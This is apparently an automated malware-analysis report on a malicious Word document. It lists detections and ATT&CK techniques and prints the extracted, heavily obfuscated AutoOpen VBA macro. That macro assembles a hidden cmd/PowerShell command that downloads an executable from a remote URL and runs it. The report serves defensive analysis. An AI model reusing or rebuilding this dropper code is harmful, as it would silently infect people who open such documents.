MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro is heavily obfuscated and appears to be constructing commands to execute a secondary payload, likely a downloader. The ClamAV detection as 'Doc.Dropper.Agent' further supports this assessment. The primary IOC is the obfuscated command string constructed by the macro.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-7532226-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7532226-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3365 bytes |
SHA-256: bb583482276e683dba987aa1b393bf6da1c37708b293ca158ee957931a4a0968 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BZRqYsjKl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim jXuRqV()
ReDim jXuRqV(2)
jXuRqV(0) = 50
jXuRqV(1) = 135650616
Dim NXujYS()
ReDim NXujYS(2)
NXujYS(0) = 12
NXujYS(1) = 7817601
Dim MDCwL()
ReDim MDCwL(3)
MDCwL(0) = 187301038
MDCwL(1) = 75479068
MDCwL(2) = 454090409
Dim zriij()
ReDim zriij(2)
zriij(0) = 9564
zriij(1) = 1839
Shell@ rXKVkXGl + RrLjqksu + WaBHpKXBrmsN, Format(0)
Dim urRzr()
ReDim urRzr(2)
urRzr(0) = 783
urRzr(1) = 46630952
Dim CsCTG()
ReDim CsCTG(4)
CsCTG(0) = 46
CsCTG(1) = 2826
CsCTG(2) = 6
CsCTG(3) = 994
Dim WmCoXj()
ReDim WmCoXj(2)
WmCoXj(0) = 1
WmCoXj(1) = 7
Dim HwrhU()
ReDim HwrhU(3)
HwrhU(0) = 627
HwrhU(1) = 7719
HwrhU(2) = 767
End Sub
Attribute VB_Name = "USDdzpzSs"
Function rXKVkXGl()
On _
Error _
Resume _
Next
Dim UtwrUn()
ReDim UtwrUn(2)
UtwrUn(0) = 199778218
UtwrUn(1) = 5
Dim NlPNT()
ReDim NlPNT(5)
NlPNT(0) = 41
NlPNT(1) = 2745
NlPNT(2) = 54773991
NlPNT(3) = 386194349
NlPNT(4) = 4584
hQZdbC = Format(Chr(0 + 5 + 10 + 15 + 69)) + "md /V^:^ON/" + Format(Chr(0 + 3 + 7 + 10 + 47)) + Format(Chr(0 + 1 + 3 + 4 + 26)) + "^se^t pr^" + "q=^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ }}^{^h" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^t^a" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "}" + "^;k^aer^b;^X^L^K^$^" + " m^e^tI^-^ekovn^I^;)^" + "XL^K$^ ^,kB^m^$(" + "^el^iF^" + "da^o^ln^w^oD.^E^T" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "$^{yr^t" + "^{)^X^Z^" + "t^$ ni ^kBm^$(^h" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "aer^of^;'" + "^ex^e^.^'^+iv^o^$^+'^\'^+" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^i^lb^u^p:vne^$^=X^LK" + "^$^;'^31^6^' "
Dim TPzNH()
ReDim TPzNH(5)
TPzNH(0) = 784
TPzNH(1) = 274362317
TPzNH(2) = 143594885
TPzNH(3) = 6
TPzNH(4) = 68
QjiYU = "= ^iv^o^$;)^'@'(t^ilpS.^'n^k^t" + "^.1^yl^i^q^=^l?^ph^" + "p^.^d^o^p" + "ovm^e^k/^EOX/^m" + "^o" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^.^tr^akn^e^gav//:" + "p^t^t^"
Dim ziqzn()
ReDim ziqzn(2)
ziqzn(0) = 14
ziqzn(1) = 1
zzRKRzJEcsj = "h'^=X^Zt$;tne^il" + Format(Chr(0 + 3 + 7 + 10 + 47)) + "^be^W.teN^ t" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^e^j^b^o-w^en=^ET" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^$" + " ^l^l^eh^sr" + "e^w^op&&fo" + "r /^L %^" + "F ^in (2^5^9;^-^1" + "^;0)^d^o ^s^et ^q^U=!^q^" + "U!!pr^q:~%^F,1!&&" + "^i^f %^F" + " ^eq^u ^0 " + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^a^l^"
Dim IZGOPf()
ReDim IZGOPf(4)
IZGOPf(0) = 4437
IZGOPf(1) = 2
IZGOPf(2) = 890
IZGOPf(3) = 7
Dim BpzTj()
ReDim BpzTj(3)
BpzTj(0) = 3
BpzTj(1) = 251661304
BpzTj(2) = 4
Dim YVmsN()
ReDim YVmsN(3)
YVmsN(0) = 239070546
YVmsN(1) = 389
YVmsN(2) = 366532845
DUwbo = "l %^q^U:^~^-26^0%" + Format(Chr(0 + 1 + 3 + 4 + 26)) + ""
rXKVkXGl = hQZdbC + QjiYU + zzRKRzJEcsj + DUwbo
Dim HEwYKl()
ReDim HEwYKl(3)
HEwYKl(0) = 283193433
HEwYKl(1) = 18
HEwYKl(2) = 401
Dim lkWwRR()
ReDim lkWwRR(4)
lkWwRR(0) = 66
lkWwRR(1) = 257372954
lkWwRR(2) = 183638031
lkWwRR(3) = 1298
Dim IzNOlw()
ReDim IzNOlw(2)
IzNOlw(0) = 441444435
IzNOlw(1) = 3
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.